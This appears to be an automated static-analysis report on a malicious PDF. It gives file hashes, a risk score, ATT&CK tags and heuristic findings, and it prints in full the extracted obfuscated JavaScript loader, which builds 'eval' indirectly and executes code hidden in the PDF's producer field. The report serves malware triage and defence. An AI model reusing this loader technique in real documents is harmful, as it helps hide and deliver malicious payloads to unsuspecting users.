Malicious PDF — malware analysis report

Static analysis result for SHA-256 e134b7990ba8851f…

MALICIOUS

PDF

22.1 KB Created: 2010-07-25 10:32:51 First seen: 2026-05-09
MD5: aa73a9f235c26d9d7b56744badbddd0f SHA-1: cbcadbcac49268aad48c74f926adcc0722c069f6 SHA-256: e134b7990ba8851fee633f50ccc769b6f6ae667a6bf0e88f71699775c01d9ce8
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The ML classifier strongly indicates this PDF is malicious. Static analysis detected embedded JavaScript, including the use of String.fromCharCode, which is often used for obfuscation. The JavaScript stream, named 'javascript_obj0001_000.js', is likely responsible for executing the malicious payload. The primary attack pattern involves luring the user into opening a malicious PDF that exploits vulnerabilities or executes embedded scripts.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    bbbu\(bbbu\('String.fromCharCode\(' + wga + '\)'\)\);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x5617 376 bytes
SHA-256: f0981da6c03e635f8a1cb0f7d39e03c15dea749f4ee02bf70f31b3272233d829
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
xuxw = app;
mydzq = new Date(2010,11,4);
var dams='';
var rvig = 'e'+mydzq.getDay()+'a'+dams+'l';
rvig = rvig.replace('6','v');
bbbu=xuxw[rvig];
var dams='';
bbbu('va'+dams+'r uqfm=th'+dams+'i'+dams+'s');
iyeo='pr' + dams + mydzq.getDay() + dams + 'uc' +'er';
iyeo = iyeo.replace('6', 'od');
var wga = uqfm[iyeo];
bbbu(bbbu('String.fromCharCode(' + wga + ')'));